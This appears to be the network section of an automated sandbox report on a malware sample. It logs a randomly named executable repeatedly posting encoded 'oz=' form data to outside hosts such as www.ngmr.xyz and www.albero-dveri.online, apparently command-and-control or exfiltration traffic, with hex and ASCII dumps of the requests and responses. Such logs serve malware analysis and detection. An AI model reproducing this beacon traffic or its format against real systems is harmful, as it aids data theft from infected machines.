                                                                                                                                              Data Ascii: rials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www
                                                                                                                                              Oct 4, 2024 08:07:53.960980892 CEST1289INData Raw: 20 68 6f 73 74 69 6e 67 20 66 6f 72 20 79 6f 75 72 20 73 75 63 63 65 73 73 66 75 6c 20 6f 6e 6c 69 6e 65 20 70 72 6f 6a 65 63 74 73 2e 3c 2f 70 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 73 74 69 6e 67 65 72
                                                                                                                                              Data Ascii: hosting for your successful online projects.</p><br><a href=https://www.hostinger.com rel=nofollow>Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add w
                                                                                                                                              Oct 4, 2024 08:07:53.960994005 CEST1289INData Raw: 5b 5d 2c 6e 3d 30 2c 74 3d 6f 2e 6c 65 6e 67 74 68 3b 6e 3c 74 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d 28 36 33 34 38 38 26 28 72 3d 6f 5b 6e 2b 2b 5d 29 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28
                                                                                                                                              Data Ascii: [],n=0,t=o.length;n<t;){if(55296==(63488&(r=o[n++])))throw new RangeError("UTF-16(encode): Illegal UTF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}return e.join(""
                                                                                                                                              Oct 4, 2024 08:07:53.961090088 CEST1289INData Raw: 69 63 65 28 66 2c 30 2c 61 29 2c 66 2b 2b 7d 69 66 28 74 29 66 6f 72 28 66 3d 30 2c 77 3d 6d 2e 6c 65 6e 67 74 68 3b 66 3c 77 3b 66 2b 2b 29 79 5b 66 5d 26 26 28 6d 5b 66 5d 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6d 5b 66
                                                                                                                                              Data Ascii: ice(f,0,a),f++}if(t)for(f=0,w=m.length;f<w;f++)y[f]&&(m[f]=String.fromCharCode(m[f]).toUpperCase().charCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf1
                                                                                                                                              Oct 4, 2024 08:07:53.961100101 CEST100INData Raw: 2c 61 63 63 6f 75 6e 74 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 61 74 68 4e 61 6d 65 22 29 3b 61 63 63 6f 75 6e 74 2e 69 6e 6e 65 72 48 54 4d 4c 3d 70 75 6e 79 63 6f 64 65 2e 54 6f 55 6e 69 63 6f 64 65 28
                                                                                                                                              Data Ascii: ,account=document.getElementById("pathName");account.innerHTML=punycode.ToUnicode(pathName)</script>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              14192.168.11.204974454.67.87.110804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:07:59.389911890 CEST795OUTPOST /txr6/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.ngmr.xyz
                                                                                                                                              Origin: http://www.ngmr.xyz
                                                                                                                                              Referer: http://www.ngmr.xyz/txr6/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 71 52 6f 37 55 57 6c 47 45 32 70 55 6a 58 31 47 76 52 66 63 73 44 4a 6a 63 75 79 4f 6d 48 6b 49 44 72 39 54 42 42 2b 45 54 5a 30 2b 49 4e 42 64 78 2f 35 6d 61 52 62 66 6d 2f 54 74 7a 72 49 39 49 65 2f 56 4c 6b 42 52 41 58 6e 51 35 44 78 4b 6a 42 6e 42 32 54 67 2b 71 57 63 32 34 7a 6d 38 69 4b 42 71 55 58 5a 7a 42 51 4d 42 74 62 5a 36 66 56 38 63 32 34 75 51 30 6e 33 7a 66 61 75 4e 4a 68 70 39 7a 2f 45 6d 34 57 6d 77 37 6f 77 73 74 4e 77 79 51 78 74 45 4c 39 50 71 32 78 7a 35 56 73 34 2b 49 55 31 6e 71 34 48 34 34 2b 2b 79 2f 58 70 39 64 71 31 36 4b 5a 55 69 76 4e 72 55 70 51 3d 3d
                                                                                                                                              Data Ascii: oz=qRo7UWlGE2pUjX1GvRfcsDJjcuyOmHkIDr9TBB+ETZ0+INBdx/5maRbfm/TtzrI9Ie/VLkBRAXnQ5DxKjBnB2Tg+qWc24zm8iKBqUXZzBQMBtbZ6fV8c24uQ0n3zfauNJhp9z/Em4Wmw7owstNwyQxtEL9Pq2xz5Vs4+IU1nq4H44++y/Xp9dq16KZUivNrUpQ==
                                                                                                                                              Oct 4, 2024 08:07:59.544698954 CEST550INHTTP/1.1 404 Not Found
                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                              Content-Length: 282
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Date: Fri, 04 Oct 2024 06:30:47 GMT
                                                                                                                                              X-Varnish: 1110522503
                                                                                                                                              Age: 0
                                                                                                                                              Via: 1.1 varnish
                                                                                                                                              Connection: close
                                                                                                                                              X-Varnish-Cache: MISS
                                                                                                                                              Server: C2M Server v1.02
                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 78 72 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              15192.168.11.204974554.67.87.110804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:08:02.070502996 CEST815OUTPOST /txr6/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.ngmr.xyz
                                                                                                                                              Origin: http://www.ngmr.xyz
                                                                                                                                              Referer: http://www.ngmr.xyz/txr6/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 71 52 6f 37 55 57 6c 47 45 32 70 55 6a 33 6c 47 73 79 33 63 6b 44 4a 67 41 2b 79 4f 73 6e 6b 4d 44 72 68 54 42 41 37 44 54 72 51 2b 49 74 78 64 77 36 5a 6d 5a 52 62 66 30 66 54 6f 33 72 49 36 49 65 7a 72 4c 68 68 52 41 55 62 51 35 42 70 4b 6a 57 7a 4f 6e 54 67 34 7a 6d 63 34 38 7a 6d 38 69 4b 42 71 55 58 39 5a 42 55 67 42 73 71 4a 36 4f 45 38 62 6f 6f 75 66 33 6e 33 7a 62 61 75 7a 4a 68 6f 65 7a 36 67 63 34 55 75 77 37 6f 67 73 74 63 77 78 61 78 74 43 50 39 4f 47 78 68 6d 75 4e 75 34 6a 59 6e 4a 33 74 72 2f 7a 30 49 76 6f 69 6c 64 5a 65 35 70 49 4f 70 74 4b 74 50 71 50 30 65 50 52 51 4f 55 49 34 57 77 46 6f 4d 43 75 35 47 54 78 4f 61 4d 3d
                                                                                                                                              Data Ascii: oz=qRo7UWlGE2pUj3lGsy3ckDJgA+yOsnkMDrhTBA7DTrQ+Itxdw6ZmZRbf0fTo3rI6IezrLhhRAUbQ5BpKjWzOnTg4zmc48zm8iKBqUX9ZBUgBsqJ6OE8boouf3n3zbauzJhoez6gc4Uuw7ogstcwxaxtCP9OGxhmuNu4jYnJ3tr/z0IvoildZe5pIOptKtPqP0ePRQOUI4WwFoMCu5GTxOaM=
                                                                                                                                              Oct 4, 2024 08:08:02.224946022 CEST550INHTTP/1.1 404 Not Found
                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                              Content-Length: 282
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Date: Fri, 04 Oct 2024 06:30:50 GMT
                                                                                                                                              X-Varnish: 1110522538
                                                                                                                                              Age: 0
                                                                                                                                              Via: 1.1 varnish
                                                                                                                                              Connection: close
                                                                                                                                              X-Varnish-Cache: MISS
                                                                                                                                              Server: C2M Server v1.02
                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 78 72 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              16192.168.11.204974654.67.87.110804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:08:04.757848978 CEST1289OUTPOST /txr6/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.ngmr.xyz
                                                                                                                                              Origin: http://www.ngmr.xyz
                                                                                                                                              Referer: http://www.ngmr.xyz/txr6/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 71 52 6f 37 55 57 6c 47 45 32 70 55 6a 33 6c 47 73 79 33 63 6b 44 4a 67 41 2b 79 4f 73 6e 6b 4d 44 72 68 54 42 41 37 44 54 72 59 2b 49 65 35 64 78 63 52 6d 59 52 62 66 76 66 54 70 33 72 4a 2f 49 65 72 76 4c 68 73 73 41 52 66 51 34 69 68 4b 32 53 66 4f 2b 44 67 34 75 57 63 35 34 7a 6d 54 69 4f 6c 75 55 58 74 5a 42 55 67 42 73 70 42 36 4f 56 38 62 71 6f 75 51 30 6e 33 76 66 61 76 65 4a 68 77 67 7a 37 68 72 37 6c 4f 77 37 4a 51 73 76 75 49 78 48 68 74 41 44 64 4f 65 78 68 37 70 4e 74 63 4a 59 6d 39 5a 74 6f 76 7a 6e 34 71 32 79 57 70 39 66 75 52 41 4f 62 39 33 6e 2f 69 7a 36 5a 2f 6f 57 73 34 67 77 78 30 76 75 75 57 67 6f 32 66 78 50 65 67 59 41 62 2f 44 6e 6c 79 70 62 78 79 6f 2b 62 51 6c 2b 38 76 51 71 2f 62 55 51 61 74 70 46 57 33 50 7a 49 53 50 46 67 73 63 45 6c 43 35 46 4e 43 4d 35 73 48 36 32 33 42 39 36 6c 76 42 36 46 32 4b 47 65 58 50 65 31 75 45 39 4b 34 74 35 79 4b 49 73 56 5a 4b 2f 73 56 61 76 6a 76 7a 59 74 30 77 69 33 6e 34 31 4f 72 41 36 6e 41 4b 2b 4e 70 2b 77 41 66 41 78 39 33 [TRUNCATED]
                                                                                                                                              Data Ascii: oz=qRo7UWlGE2pUj3lGsy3ckDJgA+yOsnkMDrhTBA7DTrY+Ie5dxcRmYRbfvfTp3rJ/IervLhssARfQ4ihK2SfO+Dg4uWc54zmTiOluUXtZBUgBspB6OV8bqouQ0n3vfaveJhwgz7hr7lOw7JQsvuIxHhtADdOexh7pNtcJYm9Ztovzn4q2yWp9fuRAOb93n/iz6Z/oWs4gwx0vuuWgo2fxPegYAb/Dnlypbxyo+bQl+8vQq/bUQatpFW3PzISPFgscElC5FNCM5sH623B96lvB6F2KGeXPe1uE9K4t5yKIsVZK/sVavjvzYt0wi3n41OrA6nAK+Np+wAfAx93u5MbdkFr5VbJmcTeWor6g1Gou+SXSQIkt/8m+KYxgFAuJpcEp+pl+9F4xC7SBpfDgmyJqfy6y9pRB02xBS6kgJnIOpAxSuxX6pFSWYS1XCzZNMtLId3Vkyz5KxoVnbwHbKB8FmGQj1fWHfuATFF+BAf+yWomXiOfWv+wcP1J7JwjH9a82waCvQxhijt+ZUM3xxPEzGPI3QzIZBZ7f45DbzmE6DQnRRQBODQaBxvVA46RfsojREeyaYEdFsL90keHRf8hLqgoJzXY3RXTNN/yv1Gf95U+wUH/eKLrGV3z6ja0bZSGnIaoyNsfHIYlNvaUWPca5qh0J2EY5lGSTkhnOCt7mkdUUO+E0m
                                                                                                                                              Oct 4, 2024 08:08:04.757869959 CEST3867OUTData Raw: 36 62 46 6b 64 64 38 32 31 54 74 74 33 4b 37 72 75 45 42 4e 4b 56 76 58 55 61 41 53 44 41 58 70 53 4c 31 55 34 52 59 69 2f 33 6d 38 66 4b 2b 70 37 52 2f 6c 39 78 4a 49 43 64 6b 71 31 68 31 4e 4e 7a 35 41 57 33 54 4d 2b 51 59 52 54 32 4b 79 30 6e
                                                                                                                                              Data Ascii: 6bFkdd821Ttt3K7ruEBNKVvXUaASDAXpSL1U4RYi/3m8fK+p7R/l9xJICdkq1h1NNz5AW3TM+QYRT2Ky0nSq1jIs1a2ml/3x2h0ch8HUw+0vvJ6FwW1ISvdTyUK8JHqBuVXE8hcDIY54rTxfccaRYyyBbI59ec3Kwvd+2UmgldEua9dfIQn/pZumElQei9JlFoJj5xlaAer1tJXSXbzBXVHZl5q7gtk1ptbXv3BBSxm9rpJctyj
                                                                                                                                              Oct 4, 2024 08:08:04.757919073 CEST2808OUTData Raw: 2b 53 55 73 4b 5a 42 59 38 46 34 6f 33 51 78 2f 34 72 64 55 75 62 38 55 49 51 35 41 58 48 66 7a 46 38 55 57 48 61 45 67 47 32 62 34 66 61 45 45 32 70 63 56 63 4c 65 31 62 73 57 6a 34 45 38 6e 73 62 35 65 65 31 6f 76 6e 57 4e 54 4f 52 75 55 36 6b
                                                                                                                                              Data Ascii: +SUsKZBY8F4o3Qx/4rdUub8UIQ5AXHfzF8UWHaEgG2b4faEE2pcVcLe1bsWj4E8nsb5ee1ovnWNTORuU6kUnXycoGr0REY+5eq3aELCZIw29uHr+PlLx7aUJ0fBQ8M+PmaE+x6aXiQ1t5X8Br1wMaXypRDwVibJv84OM6oid5R7fqvZIZnZlWUsqdkdZHF2r5y/D0sjk6TQHvR0XH5ag5wpdd/6iDfToJgtTq7iZokhVNUw3KV5
                                                                                                                                              Oct 4, 2024 08:08:04.912288904 CEST550INHTTP/1.1 404 Not Found
                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                              Content-Length: 282
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Date: Fri, 04 Oct 2024 06:30:53 GMT
                                                                                                                                              X-Varnish: 1110522577
                                                                                                                                              Age: 0
                                                                                                                                              Via: 1.1 varnish
                                                                                                                                              Connection: close
                                                                                                                                              X-Varnish-Cache: MISS
                                                                                                                                              Server: C2M Server v1.02
                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 78 72 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              17192.168.11.204974754.67.87.110804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:08:07.449577093 CEST543OUTGET /txr6/?oz=nTAbXiRbAR9Tmn1EygfckhJ8auTVp3cQBZgFAHmQGrw0Kpxo+btzHXTBwKiLhdY3AsfxfRA0GE/MmBFG+RiimQs6glJH3Tq6ibBpV287KGVZpLZHDS41jcE=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.ngmr.xyz
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Oct 4, 2024 08:08:07.603869915 CEST550INHTTP/1.1 404 Not Found
                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                              Content-Length: 282
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Date: Fri, 04 Oct 2024 06:30:55 GMT
                                                                                                                                              X-Varnish: 1110522614
                                                                                                                                              Age: 0
                                                                                                                                              Via: 1.1 varnish
                                                                                                                                              Connection: close
                                                                                                                                              X-Varnish-Cache: MISS
                                                                                                                                              Server: C2M Server v1.02
                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 78 72 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              18192.168.11.2049748194.58.112.174804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:08:13.202764988 CEST828OUTPOST /7cy1/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.albero-dveri.online
                                                                                                                                              Origin: http://www.albero-dveri.online
                                                                                                                                              Referer: http://www.albero-dveri.online/7cy1/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 41 73 47 48 4b 68 70 79 59 49 33 49 57 37 77 45 68 62 50 66 6a 64 58 32 48 4e 45 7a 31 32 6e 6e 37 4c 49 62 4d 5a 77 42 38 6f 5a 50 49 63 43 53 5a 6e 74 4c 78 52 55 75 45 75 7a 53 32 56 72 75 44 78 47 6c 58 65 53 32 38 44 2b 37 42 68 72 42 51 4f 2f 65 76 76 7a 65 5a 78 30 4d 4b 35 2f 63 7a 43 51 61 74 55 52 4b 2f 50 4b 55 2b 4f 65 6c 6d 4b 62 58 61 50 54 6d 42 46 36 4a 39 6e 63 35 33 52 31 6b 73 44 49 49 38 2b 70 51 75 74 7a 32 68 70 69 76 31 47 4f 46 58 34 59 48 76 4a 37 49 4f 5a 66 66 38 6d 64 42 4d 46 36 54 64 79 71 47 4b 48 73 74 67 6f 54 4c 54 32 34 66 50 43 79 6e 6a 77 3d 3d
                                                                                                                                              Data Ascii: oz=AsGHKhpyYI3IW7wEhbPfjdX2HNEz12nn7LIbMZwB8oZPIcCSZntLxRUuEuzS2VruDxGlXeS28D+7BhrBQO/evvzeZx0MK5/czCQatURK/PKU+OelmKbXaPTmBF6J9nc53R1ksDII8+pQutz2hpiv1GOFX4YHvJ7IOZff8mdBMF6TdyqGKHstgoTLT24fPCynjw==
                                                                                                                                              Oct 4, 2024 08:08:13.451306105 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Fri, 04 Oct 2024 06:08:13 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Content-Encoding: gzip
                                                                                                                                              Data Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f [TRUNCATED]
